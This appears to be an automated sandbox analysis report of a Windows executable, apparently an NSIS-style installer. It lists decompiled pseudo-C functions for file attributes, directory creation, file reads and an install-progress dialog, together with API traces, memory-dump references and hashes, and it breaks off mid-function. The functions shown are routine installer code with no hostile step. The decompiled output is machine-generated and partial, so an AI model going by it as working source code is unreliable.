                                                Uniqueness Score: -1.00%

                                                Function 00405850, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00405850(CHAR* _a4) {
				signed char _t3;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t3;
			}




                                                0x00405854
                                                0x0040585d
                                                0x00000000
                                                0x00405866
                                                0x0040586c

                                                APIs
                                                • GetFileAttributesA.KERNELBASE(?,0040565B,?,?,?), ref: 00405854
                                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405866
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
                                                • Instruction ID: 81e3be7da977fa0fdb855dbc2a497946ad1e8e9610c44c99cc48e92da118c7e0
                                                • Opcode Fuzzy Hash: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
                                                • Instruction Fuzzy Hash: C2C00271808501AAD6016B34EE0D81F7B66EB54321B148B25F469A01F0C7315C66DA2A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004053C3, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E004053C3(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                0x004053c9
                                                0x004053d1
                                                0x00000000
                                                0x004053d7
                                                0x00000000

                                                APIs
                                                • CreateDirectoryA.KERNELBASE(?,00000000,004030EE,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 004053C9
                                                • GetLastError.KERNEL32 ref: 004053D7
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: CreateDirectoryErrorLast
                                                • String ID:
                                                • API String ID: 1375471231-0
                                                • Opcode ID: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                                • Instruction ID: 6b45de36f316d487aa01e9413b839baa5bb3cf32c01ac4838d60d751b980a7e6
                                                • Opcode Fuzzy Hash: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                                • Instruction Fuzzy Hash: E0C04C30619642DBD7105B31ED08B177E60EB50781F208935A506F11E0D6B4D451DD3E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00403081, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00403081(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                                                0x00403085
                                                0x00403098
                                                0x004030a0
                                                0x00000000
                                                0x004030a7
                                                0x00000000
                                                0x004030a9

                                                APIs
                                                • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF), ref: 00403098
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                                                • Instruction ID: e4cef5105026143dd13b930ce46becb45ea6c66ba88fb4286e933b642882ba15
                                                • Opcode Fuzzy Hash: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                                                • Instruction Fuzzy Hash: F3E08631211118FBDF209E51EC00A973B9CDB04362F008032B904E5190D538DA10DBA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004030B3, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E004030B3(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
				return _t2;
			}




                                                0x004030c1
                                                0x004030c7

                                                APIs
                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E1C,000081E4), ref: 004030C1
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
                                                • Instruction ID: aafe5e0ddee8b519ffd98e4e857b28c3b9165386d483fecacc2863ad1570d206
                                                • Opcode Fuzzy Hash: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
                                                • Instruction Fuzzy Hash: D6B01231544200BFDB214F00DF06F057B21B79C701F208030B340380F082712430EB1E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 10008882, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 25%
                                                			E10008882() {
				void* _t1;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t7;

				_push(1);
				_push(0);
				_push(0); // executed
				_t1 = E100088E9(_t2, _t3, _t4, _t7); // executed
				return _t1;
			}








                                                0x10008882
                                                0x10008884
                                                0x10008886
                                                0x10008888
                                                0x10008890

                                                APIs
                                                • _doexit.LIBCMT ref: 10008888
                                                  • Part of subcall function 100088E9: __lock.LIBCMT ref: 100088F7
                                                  • Part of subcall function 100088E9: RtlDecodePointer.NTDLL(10019368,0000001C,1000887D,?,00000001,00000000,?,1000865A,000000FF,?,10009F3B,00000011,?,?,1000CB3C,0000000D), ref: 10008936
                                                  • Part of subcall function 100088E9: DecodePointer.KERNEL32(?,1000865A,000000FF,?,10009F3B,00000011,?,?,1000CB3C,0000000D), ref: 10008947
                                                  • Part of subcall function 100088E9: EncodePointer.KERNEL32(00000000,?,1000865A,000000FF,?,10009F3B,00000011,?,?,1000CB3C,0000000D), ref: 10008960
                                                  • Part of subcall function 100088E9: DecodePointer.KERNEL32(-00000004,?,1000865A,000000FF,?,10009F3B,00000011,?,?,1000CB3C,0000000D), ref: 10008970
                                                  • Part of subcall function 100088E9: EncodePointer.KERNEL32(00000000,?,1000865A,000000FF,?,10009F3B,00000011,?,?,1000CB3C,0000000D), ref: 10008976
                                                  • Part of subcall function 100088E9: DecodePointer.KERNEL32(?,1000865A,000000FF,?,10009F3B,00000011,?,?,1000CB3C,0000000D), ref: 1000898C
                                                  • Part of subcall function 100088E9: DecodePointer.KERNEL32(?,1000865A,000000FF,?,10009F3B,00000011,?,?,1000CB3C,0000000D), ref: 10008997
                                                  • Part of subcall function 100088E9: __initterm.LIBCMT ref: 100089BF
                                                  • Part of subcall function 100088E9: __initterm.LIBCMT ref: 100089D0
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.497246318.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000004.00000002.497232899.0000000010000000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497307012.0000000010014000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497331845.000000001001A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497358884.000000001001F000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Pointer$Decode$Encode__initterm$__lock_doexit
                                                • String ID:
                                                • API String ID: 3712619029-0
                                                • Opcode ID: 20a20f608ea4bc6c94e18f730bbbe563946a4bfee6b1cba253202f95a216a98f
                                                • Instruction ID: e6994391439ff2091fcc02a30716a5b2c18efe1f1a304855d421632494bfa426
                                                • Opcode Fuzzy Hash: 20a20f608ea4bc6c94e18f730bbbe563946a4bfee6b1cba253202f95a216a98f
                                                • Instruction Fuzzy Hash: F3A00269BD430021F86091502C43F5825016750F41FD44050FB482C1C5E8C623585257
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 00404FC2, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278windowclipboardmemoryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 96%
                                                			E00404FC2(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				unsigned int _t93;
				int _t94;
				int _t95;
				long _t98;
				void* _t101;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x423724; // 0x0
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					__eflags = _a8 - 0x405;
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404F56, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L17:
						__eflags = _a8 - 0x404;
						if(_a8 != 0x404) {
							L25:
							__eflags = _a8 - 0x7b;
							if(_a8 != 0x7b) {
								goto L20;
							}
							__eflags = _a12 - _t154;
							if(_a12 != _t154) {
								goto L20;
							}
							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
							__eflags = _t87 - _t149;
							_a8 = _t87;
							if(_t87 <= _t149) {
								L37:
								return 0;
							}
							_t160 = CreatePopupMenu();
							AppendMenuA(_t160, _t149, 1, E00405BBA(_t149, _t154, _t160, _t149, 0xffffffe1));
							_t92 = _a16;
							__eflags = _t92 - 0xffffffff;
							if(_t92 != 0xffffffff) {
								_t150 = _t92;
								_t93 = _t92 >> 0x10;
								__eflags = _t93;
								_t94 = _t93;
							} else {
								GetWindowRect(_t154,  &_v28);
								_t150 = _v28.left;
								_t94 = _v28.top;
							}
							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
							_t162 = 1;
							__eflags = _t95 - 1;
							if(_t95 == 1) {
								_v60 = _t149;
								_v48 = 0x420538;
								_v44 = 0xfff;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
									__eflags = _a4 - _t149;
									_t162 = _t162 + _t98 + 2;
								} while (_a4 != _t149);
								OpenClipboard(_t149);
								EmptyClipboard();
								_t101 = GlobalAlloc(0x42, _t162);
								_a4 = _t101;
								_t163 = GlobalLock(_t101);
								do {
									_v48 = _t163;
									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
									 *_t164 = 0xa0d;
									_t163 = _t164 + 2;
									_t149 = _t149 + 1;
									__eflags = _t149 - _a8;
								} while (_t149 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L37;
						}
						__eflags =  *0x42370c - _t149; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x423f48, 8);
							__eflags =  *0x423fcc - _t149; // 0x0
							if(__eflags == 0) {
								E00404E84( *((intOrPtr*)( *0x41fd08 + 0x34)), _t149);
							}
							E00403E2D(1);
							goto L25;
						}
						 *0x41f900 = 2;
						E00403E2D(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00403EBB(_a8, _a12, _a16);
						}
						ShowWindow( *0x423710, _t149);
						ShowWindow(_t154, 8);
						E00403E89(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x423f50; // 0x601fd8
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x423710 = GetDlgItem(_a4, 0x403);
				 *0x423708 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x423724 = _t127;
				_v8 = _t127;
				E00403E89( *0x423710);
				 *0x423714 = E00404726(4);
				 *0x42372c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403E54(_a4);
				if(( *0x423f58 & 0x00000003) != 0) {
					ShowWindow( *0x423710, _t149);
					if(( *0x423f58 & 0x00000002) != 0) {
						 *0x423710 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403E89( *0x423708);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x423f58 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}


































                                                0x00404fcb
                                                0x00404fd1
                                                0x00404fda
                                                0x00404fdd
                                                0x0040516e
                                                0x00405175
                                                0x00405199
                                                0x00405199
                                                0x0040519f
                                                0x004051ac
                                                0x004051ca
                                                0x004051ca
                                                0x004051d1
                                                0x00405228
                                                0x00405228
                                                0x0040522c
                                                0x00000000
                                                0x00000000
                                                0x0040522e
                                                0x00405231
                                                0x00000000
                                                0x00000000
                                                0x0040523b
                                                0x00405241
                                                0x00405243
                                                0x00405246
                                                0x0040533f
                                                0x00000000
                                                0x0040533f
                                                0x00405255
                                                0x00405261
                                                0x00405267
                                                0x0040526a
                                                0x0040526d
                                                0x00405282
                                                0x00405285
                                                0x00405285
                                                0x00405288
                                                0x0040526f
                                                0x00405274
                                                0x0040527a
                                                0x0040527d
                                                0x0040527d
                                                0x00405298
                                                0x004052a0
                                                0x004052a1
                                                0x004052a3
                                                0x004052ac
                                                0x004052af
                                                0x004052b6
                                                0x004052bd
                                                0x004052c5
                                                0x004052c5
                                                0x004052d3
                                                0x004052d9
                                                0x004052dc
                                                0x004052dc
                                                0x004052e3
                                                0x004052e9
                                                0x004052f2
                                                0x004052f9
                                                0x00405302
                                                0x00405304
                                                0x00405307
                                                0x00405316
                                                0x00405318
                                                0x0040531e
                                                0x0040531f
                                                0x00405320
                                                0x00405320
                                                0x00405328
                                                0x00405333
                                                0x00405339
                                                0x00405339
                                                0x00000000
                                                0x004052a3
                                                0x004051d3
                                                0x004051d9
                                                0x00405209
                                                0x0040520b
                                                0x00405211
                                                0x0040521c
                                                0x0040521c
                                                0x00405223
                                                0x00000000
                                                0x00405223
                                                0x004051dd
                                                0x004051e7
                                                0x00000000
                                                0x004051ae
                                                0x004051ae
                                                0x004051b4
                                                0x004051ec
                                                0x00000000
                                                0x004051f5
                                                0x004051bd
                                                0x004051c2
                                                0x004051c5
                                                0x00000000
                                                0x004051c5
                                                0x004051ac
                                                0x00404fe3
                                                0x00404fe7
                                                0x00404ff0
                                                0x00404ff7
                                                0x00404ffa
                                                0x00404ffd
                                                0x00405000
                                                0x00405001
                                                0x00405002
                                                0x0040501b
                                                0x0040501e
                                                0x00405028
                                                0x00405037
                                                0x0040503f
                                                0x00405047
                                                0x0040504c
                                                0x0040504f
                                                0x0040505b
                                                0x00405064
                                                0x0040506d
                                                0x00405090
                                                0x00405096
                                                0x004050a7
                                                0x004050ac
                                                0x004050ba
                                                0x004050c8
                                                0x004050c8
                                                0x004050cd
                                                0x004050db
                                                0x004050db
                                                0x004050e0
                                                0x004050e3
                                                0x004050e8
                                                0x004050f4
                                                0x004050fd
                                                0x0040510a
                                                0x00405119
                                                0x0040510c
                                                0x00405111
                                                0x00405111
                                                0x00405125
                                                0x00405125
                                                0x00405139
                                                0x00405142
                                                0x0040514b
                                                0x0040515b
                                                0x00405167
                                                0x00405167
                                                0x00000000

                                                APIs
                                                • GetDlgItem.USER32(?,00000403), ref: 00405021
                                                • GetDlgItem.USER32(?,000003EE), ref: 00405030
                                                • GetClientRect.USER32 ref: 0040506D
                                                • GetSystemMetrics.USER32 ref: 00405075
                                                • SendMessageA.USER32 ref: 00405096
                                                • SendMessageA.USER32 ref: 004050A7
                                                • SendMessageA.USER32 ref: 004050BA
                                                • SendMessageA.USER32 ref: 004050C8
                                                • SendMessageA.USER32 ref: 004050DB
                                                • ShowWindow.USER32(00000000,?), ref: 004050FD
                                                • ShowWindow.USER32(?,00000008), ref: 00405111
                                                • GetDlgItem.USER32(?,000003EC), ref: 00405132
                                                • SendMessageA.USER32 ref: 00405142
                                                • SendMessageA.USER32 ref: 0040515B
                                                • SendMessageA.USER32 ref: 00405167
                                                • GetDlgItem.USER32(?,000003F8), ref: 0040503F
                                                  • Part of subcall function 00403E89: SendMessageA.USER32 ref: 00403E97
                                                • GetDlgItem.USER32(?,000003EC), ref: 00405184
                                                • CreateThread.KERNEL32(00000000,00000000,Function_00004F56,00000000), ref: 00405192
                                                • CloseHandle.KERNEL32(00000000), ref: 00405199
                                                • ShowWindow.USER32(00000000), ref: 004051BD
                                                • ShowWindow.USER32(00000000,00000008), ref: 004051C2
                                                • ShowWindow.USER32(00000008), ref: 00405209
                                                • SendMessageA.USER32 ref: 0040523B
                                                • CreatePopupMenu.USER32 ref: 0040524C
                                                • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405261
                                                • GetWindowRect.USER32 ref: 00405274
                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405298
                                                • SendMessageA.USER32 ref: 004052D3
                                                • OpenClipboard.USER32(00000000), ref: 004052E3
                                                • EmptyClipboard.USER32 ref: 004052E9
                                                • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004052F2
                                                • GlobalLock.KERNEL32 ref: 004052FC
                                                • SendMessageA.USER32 ref: 00405310
                                                • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405328
                                                • SetClipboardData.USER32 ref: 00405333
                                                • CloseClipboard.USER32 ref: 00405339
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                • String ID: {
                                                • API String ID: 590372296-366298937
                                                • Opcode ID: 2304b148e9a21fd8fd2dbd7aea04fbfc66f4e7d68f979f8d2529fbafd725d49b
                                                • Instruction ID: 6929f331228a41c4e1f6bf5049925f100d3ed94cd800429e98060a15954be78d
                                                • Opcode Fuzzy Hash: 2304b148e9a21fd8fd2dbd7aea04fbfc66f4e7d68f979f8d2529fbafd725d49b
                                                • Instruction Fuzzy Hash: 6DA13AB1900208BFDB119F60DD89AAE7F79FB44355F00813AFA05BA1A0C7795E41DFA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004047D3, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478windowmemoryCOMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 98%
                                                			E004047D3(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				intOrPtr _t183;
				int _t189;
				int _t196;
				intOrPtr _t198;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				intOrPtr _t231;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				signed int _t242;
				signed int _t245;
				signed int _t247;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				signed int* _t284;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				int _t294;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				intOrPtr _t309;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;
				void* _t328;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x423f68; // 0x602184
				_t320 = SendMessageA;
				_v8 = _t182;
				_t183 =  *0x423f50; // 0x601fd8
				_t315 = 0;
				_v32 = _t280;
				_v20 = _t183 + 0x94;
				if(_a8 != 0x110) {
					L23:
					__eflags = _a8 - 0x405;
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					__eflags = _a8 - 0x4e;
					if(_a8 == 0x4e) {
						L28:
						__eflags = _a8 - 0x413;
						_v16 = _t289;
						if(_a8 == 0x413) {
							L30:
							__eflags =  *0x423f59 & 0x00000002;
							if(( *0x423f59 & 0x00000002) != 0) {
								L41:
								__eflags = _v16 - _t315;
								if(_v16 != _t315) {
									_t232 = _v16;
									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6e;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									__eflags =  *((intOrPtr*)(_t233 + 8)) - 0xfffffe6a;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										__eflags =  *((intOrPtr*)(_t233 + 0xc)) - 2;
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											_t284 =  *(_t233 + 0x5c) * 0x418 + _t280 + 8;
											 *_t284 =  *_t284 & 0xffffffdf;
											__eflags =  *_t284;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							__eflags = _a8 - 0x413;
							if(_a8 == 0x413) {
								L33:
								__eflags = _a8 - 0x413;
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E00404753(_v8, _a8 != 0x413);
								__eflags = _t240 - _t315;
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									__eflags = _t289 & 0x00000010;
									if((_t289 & 0x00000010) == 0) {
										__eflags = _t289 & 0x00000040;
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
											__eflags = _t298;
										} else {
											_t300 = _t289 ^ 0x00000080;
											__eflags = _t300;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t242 =  *0x423f58; // 0x80
										_t289 = 1;
										_a8 = 0x40f;
										_t245 =  !_t242 >> 0x00000008 & 1;
										__eflags = _t245;
										_a12 = 1;
										_a16 = _t245;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							__eflags =  *((intOrPtr*)(_t289 + 8)) - 0xfffffffe;
							if( *((intOrPtr*)(_t289 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						}
						__eflags =  *((intOrPtr*)(_t289 + 4)) - 0x408;
						if( *((intOrPtr*)(_t289 + 4)) != 0x408) {
							goto L48;
						}
						goto L30;
					} else {
						__eflags = _a8 - 0x413;
						if(_a8 != 0x413) {
							L48:
							__eflags = _a8 - 0x111;
							if(_a8 != 0x111) {
								L56:
								__eflags = _a8 - 0x200;
								if(_a8 == 0x200) {
									SendMessageA(_v8, 0x200, _t315, _t315);
								}
								__eflags = _a8 - 0x40b;
								if(_a8 == 0x40b) {
									_t220 =  *0x420514;
									__eflags = _t220 - _t315;
									if(_t220 != _t315) {
										ImageList_Destroy(_t220);
									}
									_t221 =  *0x42052c;
									__eflags = _t221 - _t315;
									if(_t221 != _t315) {
										GlobalFree(_t221);
									}
									 *0x420514 = _t315;
									 *0x42052c = _t315;
									 *0x423fa0 = _t315;
								}
								__eflags = _a8 - 0x40f;
								if(_a8 != 0x40f) {
									L86:
									__eflags = _a8 - 0x420;
									if(_a8 == 0x420) {
										__eflags =  *0x423f59 & 0x00000001;
										if(( *0x423f59 & 0x00000001) != 0) {
											__eflags = _a16 - 0x20;
											_t189 = (0 | _a16 == 0x00000020) << 3;
											__eflags = _t189;
											_t316 = _t189;
											ShowWindow(_v8, _t316);
											ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
										}
									}
									goto L89;
								} else {
									E004011EF(_t289, _t315, _t315);
									__eflags = _a12 - _t315;
									if(_a12 != _t315) {
										E0040140B(8);
									}
									__eflags = _a16 - _t315;
									if(_a16 == _t315) {
										L73:
										E004011EF(_t289, _t315, _t315);
										__eflags =  *0x423f6c - _t315; // 0x2
										_v32 =  *0x42052c;
										_t196 =  *0x423f68; // 0x602184
										_v60 = 0xf030;
										_v16 = _t315;
										if(__eflags <= 0) {
											L84:
											InvalidateRect(_v8, _t315, 1);
											_t198 =  *0x42371c; // 0x608bff
											__eflags =  *((intOrPtr*)(_t198 + 0x10)) - _t315;
											if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
												E0040470E(0x3ff, 0xfffffffb, E00404726(5));
											}
											goto L86;
										} else {
											_t142 = _t196 + 8; // 0x60218c
											_t281 = _t142;
											do {
												_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
												__eflags = _t202 - _t315;
												if(_t202 != _t315) {
													_t291 =  *_t281;
													_v68 = _t202;
													__eflags = _t291 & 0x00000001;
													_v72 = 8;
													if((_t291 & 0x00000001) != 0) {
														_t151 =  &(_t281[4]); // 0x60219c
														_v72 = 9;
														_v56 = _t151;
														_t154 =  &(_t281[0]);
														 *_t154 = _t281[0] & 0x000000fe;
														__eflags =  *_t154;
													}
													__eflags = _t291 & 0x00000040;
													if((_t291 & 0x00000040) == 0) {
